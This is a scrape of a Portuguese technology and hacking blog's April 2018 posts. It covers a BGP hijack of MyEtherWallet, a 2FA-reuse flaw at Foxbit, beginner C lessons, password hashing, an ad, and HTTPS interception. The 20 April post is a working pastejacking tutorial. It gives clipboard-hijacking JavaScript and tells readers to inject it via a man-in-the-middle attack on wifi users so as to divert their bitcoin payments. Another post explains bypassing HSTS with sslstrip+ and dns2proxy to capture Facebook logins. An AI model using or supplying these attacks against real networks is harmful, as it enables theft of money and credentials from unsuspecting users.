25 abril 2018



O que acontece quando você envia um email ou compra algo online? A maioria das coisas que você faz online requer que você envie dados a computadores a quilômetros de distancia. Mas como esses dados sabem o caminho para um site? Eles podem ficar perdidos ou serem roubados durante o caminho? 

O primeiro passo é simples, seu computador está conectado a sua rede local que está conectado ao seu provedor de internet. Os próximos passos requer navegar em um mar de conexões pelo mundo. Seus dados podem pegar bilhões de rotas possíveis, o problema é que essas rotas não são criadas igualmente. Algumas são rápidas como aviões, outras como ônibus.

Os dados encontram o caminho através do protocolo BGP. Roteadores usam este protocolo para decidir qual o melhor caminho para entregar dados ao destino. Isto funciona perfeitamente deste que os dados recebam informações confiáveis. Se for dado uma informação ruim ou maliciosa, pode causar um grande problema.

Portanto quando um trafego de internet é desviado intencionalmente ou não, isso é chamado de BGP Hijacking, route hijacking ou IP Hijacking.

Ontem - 24 de abril de 2018 - quem tentou acessar o site myetherwallet.com pode ser que teve sua carteira de ethereum comprometida.

Quando um cliente tentasse acessar myetherwallet.com seu roteador peguntaria ao seu DNS (serviço de resolução de domínios) o endereço de IP para o site em questão. Só que durante o ataque BGP Hijack, serviços de DNS que perguntassem por IP de endereços tratados pela Amazon Route 53 receberiam informação maliciosa como ilustra a imagem no topo deste artigo. No caso receberiam um endereço IP para uma página falsa do myetherwallet.com, o cliente sem notar nada acabaria comprometendo sua conta ao fornecer informações de login na página falsa.

Quem tentasse acessar o site usando HTTPS, notaria que o site falso estava usando um certificado TSL assinado por uma autoridade desconhecida, portanto só cairia no phishing se o usuário aceitasse o certificado inválido, já que o hacker teria a chave para descriptografar. Para saber mais sobre comprometer conexões HTTPS e sua segurança, clique aqui.

Provavelmente cerca de 150 mil dólares em ETH tenham sido roubados neste phishing segundo o site EtherScan.

24 abril 2018


Você está usando seu computador normalmente e de repente algum programa trava, você tenta fechar clicando infinitamente no ícone de fechamento (x) e nada, botão direito, fechar e nada acontece. 

Caso estivesse no Windows você logo daria um ctrl alt delete, selecionaria o gerenciador de tarefas, procuraria pelo programa e forçaria o programa a fechar finalizando seu processo. Mas e no Linux? Como fechar aquele maldito programa que congelou? Bom, o processo é muito mais simples.

Abra seu terminal, não precisa ser administrador do sistema, apenas digite: xkill

Então seu mouse virará um assassino em série! Clique na janela do programa que travou e boom, ele será fechado na hora.

23 abril 2018



Leandro Trindade sócio e consultor na empresa X15 Tecnologia, que realiza dentre outras consultorias também a parte de segurança de dados, divulgou uma análise técnica referente aos furtos financeiros relatados por usuários da bolsa de criptomoedas brasileira Foxbit.

Hackers teriam explorado uma falha na implementação de segurança do 2FA (autenticação em 2 fatores) na plataforma Blinktrade utilizada pela Foxbit, que consistia em reaproveitar o código 2FA obtido da vítima através de phishing por exemplo, já que a plataforma não invalidava o código quando usado, dando uma janela de tempo de 30 segundos (tempo para o código mudar) para o hacker sacar os bitcoins ou trancar o usuário do lado de fora da conta, assim realizando o saque dos bitcoins posteriormente.

Você pode ler o relatório na integra clicando aqui.

O vídeo abaixo demonstra a falha explorada:


Segundo Leandro, o hacker poderia explorar 3 cenários:

Cenário 1:
  1. Hacker cria uma página idêntica a da Foxbit e registra um domínio de nome parecido.
  2. Contrata o serviço de propagandas da Google, AdWords, para aparecer no topo dos resultados em pesquisas (como na imagem do topo deste artigo).
  3. Vítima cai na página falsa, acreditando estar lidando com a Foxbit e digita suas credenciais e apenas um código 2FA.
  4. Hacker entra na conta com login, senha e código 2FA capturado pela página falsa, acessa configurações da conta e desabilita o 2FA, logo em seguida ele habilita o 2FA novamente só que utilizando um dispositivo que ele tem controle, assim trancando a vítima fora da conta.
  5. Após 24 horas o hacker troca todos os reais por bitcoins e retira todo o dinheiro da vítima para uma carteira "irrastreável".
Cenário 2:
  1. Hacker cria uma página idêntica a da Foxbit com um sistema automatizado de furto e registra um domínio de nome parecido.
  2. Contrata o serviço de propagandas da Google, AdWords, para aparecer no topo dos resultados em pesquisas (como na imagem do topo deste artigo).
  3. Vítima cai na página falsa, acreditando estar lidando com a Foxbit e digita suas credenciais e apenas um código 2FA
  4. Então o sistema automatizado rapidamente dentro dos 30 segundos realiza o saque do saldo da vítima.
  5. Para impedir o cancelamento do saque, o sistema automatizado acessa configurações da conta e desabilita o 2FA, logo em seguida ele habilita o 2FA novamente tendo assim o controle sob a conta, pois para realizar cancelamento do saque é necessário que a vítima entre na conta e realize cancelamento manualmente.
Cenário 3:
  1. Hacker cria uma página idêntica a da Foxbit e registra um domínio de nome parecido.
  2. Contrata o serviço de propagandas da Google, AdWords, para aparecer no topo dos resultados em pesquisas (como na imagem do topo deste artigo).
  3. Vítima cai na página falsa, acreditando estar lidando com a Foxbit e digita suas credenciais e mais de um código 2FA.
  4. Hacker utiliza os códigos 2FA posteriores para realizar o saque da conta da vítima sem e-mail de confirmação.
  5. Hacker entra na conta com login, senha e códigos 2FA capturado pela página falsa, acessa configurações da conta e desabilita o 2FA, logo em seguida ele habilita o 2FA novamente tendo assim o controle sob a conta.
Vale notar que a plataforma utilizada pela Foxbit é também utilizada por outras exchanges de outros países, seu código fonte é público podendo ser acessado clicando aqui.

Em nota a Foxbit, você pode conferir clicando aqui, informou que a plataforma já foi atualizada para evitar os ataques descritos acima. Segundo a empresa agora sempre que realizar login no site será enviado um email para seu email cadastrado na plataforma para autorizar o login. Para saques, um código sempre será enviado para o email cadastrado mesmo que tenha o 2FA configurado. Também não é mais possível desabilitar o 2FA manualmente, portanto é necessário entrar em contato com o suporte para solicitar desativação caso necessite.
Este artigo faz parte do projeto #LTCode

Faça os exercícios abaixo sobre repetições em C e depois confira as respostas. Boa sorte!

1- Escreva um programa que determine todos os divisores de um dado número N.

2- Faça um programa que receba dez números inteiros e mostre a quantidade de números primos dentre os números que foram digitados.

3- Cada espectador de um cinema respondeu a um questionário no qual constava sua idade e suaopinião em relação ao filme: ótimo – 3, bom – 2, regular – 1. Faça um programa que receba a idade e a opinião de 15 espectadores, calcule e mostre:

  • a média das idades das pessoas que responderam ótimo;
  • a quantidade de pessoas que responderam regular;
  • a percentagem de pessoas que responderam bom, entre todos os espectadores analisados.

4- Faça um programa que receba um conjunto de valores inteiros e positivos, calcule e mostre omaior e o menor valor do conjunto. Considere que:

  • para encerrar a entrada de dados, deve ser digitado o valor zero;
  • para valores negativos, deve ser enviada uma mensagem;
  • os valores negativos ou iguais a zero não entrarão nos cálculos.
5- Seja a seguinte série: 1, 4, 9, 16, 25, 36, ...
Faça um programa que gere esta série até o N-ésimo termo. Este N-ésimo termo é digitado pelo
usuário.

Respostas abaixo: (se não carregar abaixo, clique aqui).

>> Próxima aula, em breve.

20 abril 2018


Atenção: não nos responsabilizamos pelo seus atos ou de nossos leitores, este artigo serve apenas para compartilhar conhecimento.

Certamente vocês se lembram do nosso vídeo ensinando a técnica do pastejacking que consiste em inserir conteúdo malicioso no conteúdo que o usuário pretende copiar.

Com isso em mente, no vídeo abaixo é demonstrado uma tentativa de ataque direcionado a alterar endereços de bitcoin em uma rede local, mas você pode fazer isso em rede wifi, basta usar sua interface wifi no comando do script.

Será necessário ter instalado o mitmf em sua máquina, portanto clique aqui e saiba mais. Foi utilizado uma máquina rodando Kali Linux no vídeo abaixo, confira nossa playlist para mais informações sobre o sistema clicando aqui.



Como pode notar no vídeo, foi utilizado um ataque mitm (man in the middle) passando o tráfego da rede pela nossa máquina para que seja possível injetar um código javascript que permite inserir um texto fixo que será copiado quando o usuário copiar qualquer coisa na página que teve o javascript inserido.


Código javascript utilizado:

document.addEventListener('copy', function(e){
    console.log(e);
    e.clipboardData.setData('text/plain', 'BITCOIN-ADDRESS');
    e.preventDefault();
});


Substitua o trecho em vermelho pelo seu endereço de bitcoin, mantenha as aspas simples e salve o arquivo com a extensão .js .

Se você injetou com sucesso o script e um usuário que está conectado a rede wifi gosta de utilizar bitcoin para realizar pagamentos, existe uma probabilidade alta de você interceptar alguns bitcoins. Para isso, temos que supor que o usuário vá realizar um pagamento com bitcoins - saiba mais sobre criptomoedas clicando aqui.

Suponha que o usuário acessa algum site para comprar um produto e o vendedor aceita bitcoins como pagamento. Este usuário então copia o endereço de bitcoin do vendedor e para realizar o pagamento ele cola o endereço em sua carteira (seja no PC ou celular) para autorizar o envio de bitcoins para o vendedor. Mas infelizmente, o usuário não percebe que na verdade o que foi copiado não foi o endereço de bitcoin do vendedor... mas sim o endereço de bitcoin do hacker, quando ele se der conta que enviou os bitcoins para o endereço errado pode ser que seja muito tarde para reverter a transação, ficando no prejuízo.

O código javascript utilizado é simples, caso tenha interesse em algo mais elaborado clique aqui e confira.

Mas como evitar que casos como este aconteça comigo? Você pode evitar ataques mitm como demonstra o vídeo abaixo:


As versões recentes dos principais navegadores conseguem impedir que o atacante injete o código malicioso em sites que utilizam https, mas ainda é possível burlar essa proteção. Saiba mais clicando aqui. Também é recomendado utilizar extensões que bloqueiam javascript como NoScript.

A dica mais preciosa é conferir o endereço de bitcoin por completo antes de efetuar uma transação!

O conteúdo especificou bitcoins simplesmente por ser a criptomoeda mais utilizada... mas este tipo de ataque pode ser feito usando endereços de outras criptomoedas, caso você sabe que o alvo goste de utilizar alguma moeda em específico.



Fontes: https://github.com/dxa4481/Pastejacking
https://security.love/Pastejacking/
https://www.limontec.com/2018/03/pastejacking-hackeando-ctrlc-ctrlv.html

18 abril 2018

Este artigo faz parte do projeto #LTCode

Na aula de hoje aprenderemos sobre laços em C, ou seja aprenderemos como fazer uma linha de código ser repetida, controlar um fluxo de instruções. Para isto vamos utilizar o if, switch, do while, while e for.

Sobre o if e switch já aprendemos na aula anterior, clique aqui para ler caso ainda não leu. Continuando, a instrução while é bastante simples de se aprender.. se conseguir entender ela ficará fácil compreender as outras.

Sua estrutura é a seguinte: 

while (condição){
    instrução;
    incremento;
}

Traduzindo: 

enquanto (condição que você determinou) {
faça isso que está aqui dentro das chaves
}

Confira abaixo um exemplo usando while para contar números de 0 a 10:
Como podem observar:

enquanto(contador for menor ou igual a 10){
    imprima na tela contador;
    soma mais 1 no contador;
}

Ou seja vai ficar no loop imprimindo na tela números até contador valer 10, quando ele valer 10 a condição é falsa e então sai do while.

Para fazer o mesmo código acima utilizando for é fácil, apenas atente-se como funciona uma estrutura do for:

for(carga inicial;condição;pós-condição){
  instrução;
}

Note que o incremento já está presente na pós-condição. Confira a comparação entre while e for:
Observe que não era necessário colocar um valor para a variável de incremento no momento da declaração pois ela recebe um valor dentro do for, a carga inicial, mas como temos um while na imagem então tivermos que dar um valor para ela primeiro.

Agora o laço do... while, traduzida como 'faça... enquanto', é um pouco diferente pois a condição é checada no final da primeira repetição, ou seja, as instruções rodarão pelo menos uma vez, mesmo se a condição for falsa.

Confira:
Como ilustra a imagem acima, primeiramente vai imprimir o valor da variável i, depois vai somar +1 nela, passando a valor 21, então a condição é checada: 21 é menor ou igual a 10? Não, então sai do while em vez de continuar no loop.

Já estudamos o comando break na aula anterior, utilizando ele dentro de um laço ele vai sair do laço imediatamente fazendo parar o loop.

Exemplo:

Quando a condição de i ser igual a 2017 for atingida, será impresso o valor de i na tela e em seguida parado o loop afinal chegou no valor que queríamos na condição presente no if.

Existe também o comando continue, que só pode ser utilizada dentro de laços, ele serve para que o loop continue.

Confira um laço que imprime números pares usando 'break' e 'continue':

É possível criar repetições dentro de repetições, isso é chamado de laços encadeados, é útil quando você precisa variar uma variável enquanto outra varia. Exemplo:

while(condição){
    while(condição){
         instruções;
         incremento;
    }
    incremento;
}

Você também pode necessitar de laços infinitos, ou seja, apresentam condições sempre verdadeiras, tornando uma repetição infinita. Para sair deles você utiliza o break ou return (que aprenderemos futuramente). 

Resumindo, o laço while geralmente é utilizado quando não se sabe quantas vezes você precisará da repetição e o for já é mais utilizado quando se sabe quantas vezes o código será repetido, mas isso não é regra.

Você deve ter notado nas imagem a utilização do ++ após o nome da variável como: i++. Se leu os comentários do código, já sabe que isso é o mesmo que escrever: i=i+1. O mesmo se aplica ao usar i-- que poderia ser escrito como i=i-1, ou seja está decrementando uma unidade de i.

Mas fique esperto, existe diferenças quanto ao uso dessa forma ++ --. 
Como podem observar na imagem acima, k=j++ é diferente de k=++j :
k=j++ significa que k vai receber o valor de j e depois j vai valer j+1.
k=++j significa que k vai receber valor de j+1.

Outro exemplo:
int i=4;
printf("%d",i++ + ++i);

Imprimirá na tela o valor 10.

Em C é possível utilizar de atribuições compostas para diminuir seu código, confira abaixo uns exemplos:

x+=1 é o mesmo que x = x+1
y*=2+3 é o mesmo que y=y*(2+3)
a-=b+1 é o mesmo que a=a-(b+1)
k/=12 é o mesmo que k=k/12
r%=2 é o mesmo que r=r%2

Note que assim você não precisa ficar digitando a variável novamente toda vez que precisa de fazer operações com valores presente nela.

Por hoje é isso, até a próxima.

>> Próxima aula, clique aqui.

14 abril 2018



Entenda o que é uma função hash e como empresas utilizam essas funções para proteger as senhas de seus usuários contra ataques de força bruta. O canal Savjee no Youtube, fez um excelente vídeo simplificado explicando, confira abaixo.

Legendamos o vídeo (aguardamos publicação da legenda), portanto se preferir, confira a transcrição do áudio feita por nós abaixo.




Você já deve saber que existe um site que verifica se suas contas online foram comprometida por hackers. Então você digita seu endereço de e-mail e OH NÃO…

Você foi pwned!

Hackers agora sabem as senhas que você usou em todos esses serviços. Mas eles realmente sabem sua senha? Bem, na realidade: isso pode não ser o caso...

Para entender por que, vamos dar uma olhada em quais opções as empresas têm para proteger sua senha e armazená-la com segurança para que mesmo quando os hackers têm acesso aos seus sistemas, sua senha permanece segura.

Existem 3 maneiras nas quais uma empresa pode armazenar sua senha: eles armazenam em texto puro, usam criptografia sobre ela ou usam o que é chamado de função hash.

Vamos rapidamente passar por cima de cada um deles e vamos começar com o mais básico: texto puro. Esta é obviamente a maneira mais perigosa de armazenar senhas. Se hackers violarem o banco de dados de uma empresa, eles conseguem ver todas as senhas dos usuários. E já que muitas pessoas têm o mau hábito de usar a mesma senha para várias contas, é provável que 1 senha comprometida poderia levar a mais contas comprometidas.

Você pode pensar que as empresas não são bobas e que nenhuma delas armazena nossas senhas em texto puro. No entanto, você estaria muito errado em pensar assim. Violações anteriores nos mostraram que mesmo as principais empresas e serviços com milhões de usuários não estavam protegendo adequadamente as senhas dos usuários.

Uma alternativa possível ao armazenamento de texto puro é a criptografia. Pegue as senhas dos usuários e - antes de armazenar elas - criptografá-las com uma chave de criptografia. Isso impediria que hackers obtivessem as senhas reais dos usuários, mas ainda é muito arriscado. Sob a camada de criptografia ainda é uma senha de texto puro e por isso, se o atacante consegue roubar a chave de criptografia também, ele pode desbloquear todas as senhas.

A criptografia foi projetada para funcionar de duas maneiras: você pode criptografar as senhas de um usuário para manter ela segura, mas você também pode descriptografá-la para revelar a senha novamente. Isso é muito prático quando você quer compartilhar dados de forma segura, mas não é bom se você quer impedir que invasores violem sua senha. E isso nos leva à terceira técnica de armazenar senhas que é usando uma função hash.

Como isso funciona?

Bem funções hash pega uma entrada, que poderia ser um pedaço de texto como sua senha ou poderia ser um arquivo e transforma isso em uma string de texto que sempre tem o mesmo comprimento. Existem muitas funções diferentes de hash disponíveis, mas aqui está o que o hash SHA3 de "Hello World!” se parece:

32400b5e89822de254e8d5d94252c52bdcb27a3562ca593e980364d9848b8041b98eabe16c1a6797484941d2376864a1b0e248b0f7af8b1555a778c336a5bf48

Funções hash são muito diferentes da criptografia porque elas só funcionam unidirecionamente. Você pode calcular o hash de uma senha, mas você não pode pegar um hash e transformá-lo de volta aos dados originais. E essa é uma propriedade interessante para se ter. Ao usar hashes, as empresas podem verificar se você está logando com a senha correta, sem ter que armazenar sua senha real. No entanto, elas não são perfeitas também.

A maioria dos algoritmos de hashing são otimizados para velocidade, quanto mais hashes por segundo eles podem calcular, melhor. E isso os torna vulneráveis ​​contra ataques de força bruta. Por simplesmente tentando calcular todos as senhas possíveis, um invasor pode reverter o hash.

Um GPU moderna pode fazer isso com uma velocidade de 292 milhões de hashes por segundo (292,2 MH/s), é só uma questão de tempo antes de uma senha hash ser quebrada usando essa técnica. E se isso não for rápido o suficiente, hackers também podem usar rainbow table para acelerar o processo. Estas são listas de hashes pré-computados que podem ser usado para encontrar rapidamente senhas fracas e comumente usadas. 

A velocidade das funções de hashing é positiva para determinadas coisas. No entanto, quando se trata de armazenar senhas você não quer essa propriedade. O segundo problema acontece quando os usuários compartilham a mesma senha. Se Alice e Bob tiverem a senha "qwerty", os hashes de suas senhas serão idênticos. Então, quando um hacker quebra a senha de Bob, ele também conhecerá a senha de Alice.

Agora você pode pensar: isso não é grande coisa porque é muito improvável que diferentes pessoas usarão a mesma senha. Bem pense novamente. A senha “qwerty” foi encontrada mais de 3 milhões de vezes em violações de dados. Para piorar ainda mais: aqui está o topo 10 senha mais usada em 2017…

123456
password
12345678
qwerty
12345
123456789
letmein
1234567
football
iloveyou

Não são as senhas mais fortes...

Para se defender contra esses ataques, podemos adicionar o que é chamado de salt na senha antes nós hash (criptografar) ela. O salt é apenas alguns dados aleatórios, mas garante que o hash da sua senha será sempre único, mesmo que os outros estejam usando a mesma senha. Portanto, se Bob e Alice usam a senha "qwerty" seus hashes serão completamente diferente.

Então, se um invasor quebrar a senha de Bob, ele não pode ligar essa senha a Alice e ele tem que começar sua tentativa de crack novamente. Essa técnica evita que invasores quebrem um monte de senhas de uma só vez. Torna um ataque de força bruta mais lento, mas ainda é muito possível.

Então, para resolver isso, temos que dar uma olhada numa terceira técnica, que está usando funções especiais de hash que torna o processo de crack lento. Exemplo destes são bcrypt, scrypt ou argon2 e eles neutralizam completamente ataques força bruta. Esses algoritmos usam uma senha como entrada junto com um salt e um custo. Este último é muito interessante: o custo define o número de rodadas que o algoritmo passa e isso efetivamente diminui a velocidade.

Com o tempo, nossos computadores se tornam mais rápidos e ataques de força bruta contra esses algoritmos ficaram mais fácil. Isso porque os PC's atuais podem simplesmente tentar mais combinações em menor tempo. Tudo o que temos a fazer para combater isso é aumentar o parâmetro de custo para que o algoritmo permaneça resistente contra esses ataques.

Muito gênio!

Então, essas são as 3 opções que uma empresa tem para armazenar e proteger suas senhas. Mas por que se contentar com apenas um método, se podemos usar vários? Você não pode ser ganancioso quando se trata de segurança!

Esta proteção multicamadas é usada pelo Dropbox por exemplo. Eles pegam sua senha e começam a correr através de uma simples função hash, sem salt. Esta é a primeira linha de defesa deles. Eles então pegam o hash e o percorrem o algoritmo bcrypt com um salt e um custo de 10. Isso evita ataques de força bruta. E finalmente o hash resultante é criptografado com o Advanced Encryption Standard ou AES. A chave de criptografia para isso não é armazenada em seus bancos de dados, mas é mantido separadamente.

Então, se um invasor violar o banco de dados do Dropbox eles terão que descascar cada proteção em torno de sua senha e isso levará muito tempo. Na verdade, a tentativa de quebrar sairia mais caro do que eles ganhariam em troca compreendendo sua conta.

Então, tempo para uma conclusão então: se sua conta foi comprometida, é melhor mudar sua senha imediatamente. No entanto, dependendo das medidas de segurança da empresa que foi comprometida, pode ser possível que os hackers não tenham conseguido restaurar sua senha. Isso é graças à magia da função hash e criptografia em geral.

Então agora você sabe como as empresas podem armazenar com segurança suas senhas. Vale notar que mesmo assim os usuários devem manter medidas de segurança como nunca usar uma mesma senha em vários serviços, usar senhas fortes e alterar a senha principal, como do email que recupera outras contas frequentemente, além é claro de utilizar autenticação em 2 passos (2FA).

13 abril 2018

Este artigo faz parte do projeto #LTCode

Boa sorte com os sete exercícios sobre: if else e switch.

1- Escreva o seguinte código utilizando apenas um “if”
 if (x==0)
   if (y<=32)
      printf(“Sucesso!!!”);

2- Faça um programa que leia dois números inteiros e determine qual dos dois é maior. Considere que os dois números podem ser iguais. Neste caso, o programa deve escrever uma mensagem para o usuário informando-o de que deve entrar com números diferentes.

3- Faça um programa capaz de identificar se um número é igual a 1, 5 ou 10. Caso não seja nenhum desses valores, retornar a mensagem “Valor inválido”.

4- Faça um programa capaz de identificar se um número é par ou ímpar.

5- Faça um programa capaz de identificar se um número é um ano bissexto. Considere que para o ano ser bissexto basta que seja divisível por 400. Caso contrário, precisa ser divisível por 4 e não ser divisível por 100. Faça uma condição composta que englobe todas as regras para a definição do ano bissexto.

6- Faça um algoritmo que simule uma calculadora com as quatro operações básicas (+,-,*,/). O algoritmo deve solicitar ao usuário a entrada de dois operando e da operação a ser executada, na forma de menu. Dependendo da opção escolhida, deve ser executada a operação solicitada e escrito seu resultado. Utilize uma variável do tipo caractere para armazenar a operação e utilize o comando switch para escolher a operação a partir do operador.

7- Faça um programa que leia as três notas e as faltas de um aluno e imprima sua situação. ( “APROVADO”, “REPROVADO POR FALTA” ou “REPROVADO POR MÉDIA” ). Observação: A média para aprovação é 60 e o limite de faltas é 18.

Respostas abaixo: (se não carregar abaixo, clique aqui)

>> Próxima aula, clique aqui.

12 abril 2018

Airtrack Factory é uma empresa especializada em designer e produção de produtos infláveis para ginástica. Como o da imagem abaixo:
Segundo informações disponíveis no site airtrackzone.com, a empresa possui um rigoroso controle de qualidade. Portanto caso encontre algum problema no produto, eles prometem fazer manutenção gratuita do produto após análise.

Confira no vídeo abaixo uma demonstração dos produtos:

É possível comprar produtos no site através das principais formas de pagamentos, como cartão de crédito e Paypal. O frete é gratuito para Estados Unidos, Canadá, Europa, Austrália e Nova Zelândia. O prazo de entrega (momento da postagem até chegar ao destino) para a América do Norte e Europa é de 5 a 7 dias úteis, já para a América do Sul é de 8 a 10 dias úteis.

cheap gymnastics mats for sale (tapetes de ginástica barato para venda)
airtrack factory gymnastics

Este artigo foi patrocinado.

Vocês já devem ter visto alguns vídeos nossos relacionado a ataques man-in-the-middle (mitm - em português homem-do-meio) onde o atacante fica entre a conexão do usuário com o roteador como ilustra a imagem acima. E provavelmente você se perguntou "mais porque não consigo capturar dados em sites https?". Hoje iremos esclarecer essa dúvida abaixo.

Primeiramente devemos voltar ao ano de 2009, ano de uma palestra que abalou a segurança dos sites. Moxie Marlinspike na Black Hat DC, apresentou ao mundo sua ferramenta capaz de modificar links https para http e então capturar o tráfego da rede.

Sua primeira ferramente de impacto foi o sslsniff em 2002, destinado a realizar ataque mitm injetando certificados SSL ilegítimos. Basicamente a ferramenta intercepta as requisições do cliente ao servidor e gera um certificado para o domínio assinando ele com qualquer certificado que você especificar. Enquanto isso do outro lado da conexão, o servidor realiza a conexão normalmente. No meio dessa conexão, o atacante tem a capacidade decriptar os dados, interceptar, injetar e encriptar parecendo uma conexão segura.

Mas a ferramente apresentada em 2009 foi o SSLStrip que basicamente, sem entrar em detalhes técnicos, intercepta a conexão substituindo as requisições para http, ou seja, altera todos os links de uma página do Google por exemplo de https para http.

Para resolver este problema, navegadores passaram a utilizar cabeçalhos HSTS (HTTP Strict Transport Security). Usando esta técnica é possível proteger sites contra o downgrade de protocolo (https para http), o servidor responsável pelo site através de um campo no cabeçalho de resposta impõe uma regra ao navegador, de que o usuário só pode interagir com o site se estiver sob conexão https.

Felizmente em 2014, Leonardo Nve na BH Asia apresentou uma versão melhorada do SSLStrip. Com SSLStrip 2.0 (sslstrip+) o atacante além de fazer o downgrade de https para http, conseguia enganar o HSTS alterando o endereço do site no html. Por exemplo adicionando um quarto w em www.google.com.br . Para isto é necessário utilizar um servidor DNS para que seja capaz de resolver o endereço do site já que o DNS do seu roteador não saberá como reagir a este endereço. Portanto Leonardo lançou também o dns2proxy para interpretar o endereço.

Infelizmente muitos dos navegadores populares, contornam este problema mantendo uma lista de sites populares e sites que você costuma acessar que exigem HSTS. Portanto, é possível burlar o HSTS somente se for a primeira visita do usuário ao site. Mas nem tudo está perdido pois determinados domínios não constam nessa lista, por exemplo o domínio social.facebook.com.br não consta na lista do Google Chrome versão 65.0.3325.181 (64bits).


O mesmo acontece com twitter.com.br, enquanto que twitter.com consta na lista.

Sendo assim, voltando ao exemplo do Facebook, é possível redirecionar todas as requisições de https://facebook.com para http://social.facebook.com.br realizando um ataque DNS Spoof com dns2proxy. Assim, quando o usuário logar no site, você capturará seu email e senha se sniffar a rede já que o tráfego não está sendo criptografado.

Caso use o script MITMf para realização de ataques man-in-the-middle que engane o HSTS você só precisa adicionar --hsts e --dns ao comando de execução como ilustra a imagem abaixo:

Uma outra ferramenta semelhante que possibilita a quebra de sites https é o SSLSplit que intercepta um certificado SSL/TSL e insere outro que caso seja aceito pelo usuário, possibilita farejar os dados que trafegam, saiba mais clicando aqui.

Respondendo a pergunta do título deste artigo "Quebrar conexão HTTPS ainda é possível?". Sim é possível! Mas não é tão simples, já que você depende de um cenário favorável, como um navegador desatualizado ou ação do usuário. Então nosso artigo "Cadeado verde não garante nada sobre o site" continuará atual por um longo tempo.

Fontes:
https://null-byte.wonderhowto.com/how-to/defeating-hsts-and-bypassing-https-with-dns-server-changes-and-mitmf-0162322/
https://www.guiadoti.com/2017/09/sslstrip-2-0-hsts-bypass/
https://moxie.org/software/sslsniff/
https://www.vivaolinux.com.br/dica/Interceptando-trafego-SSL-HTTPS-com-Ettercap-e-SSLstrip
https://github.com/droe/sslsplit

05 abril 2018


Hoje nós completamos 6 anos de atividade! Mais que um blog sobre tecnologia e hacking, aqui temos apenas um singelo backup de parte do que se passa na mente daqueles que buscam conhecimento. 

Metas para os próximos anos:

* tutoriais exclusivos.
* alcançar mais idiomas além do português.
* mais artigos de qualidade sobre criptomoedas.
* continuar com o projeto #LTCode.
* melhorar qualidade dos vídeos em nosso canal.
* continuar sendo simples e fácil de entender.

Junte-se a nós em limontec.com/p/colaborar.html .

Acompanhe nós no Youtube em: youtube.com/limontec .

Quer nos corrigir, elogiar, dar opinião ou sugestão... não exite em nos mandar um email em limontec.com/p/contato.html .

:)








Please Donate To Bitcoin Address: [[address]]





Donation of [[value]] BTC Received. Thank You.


[[error]]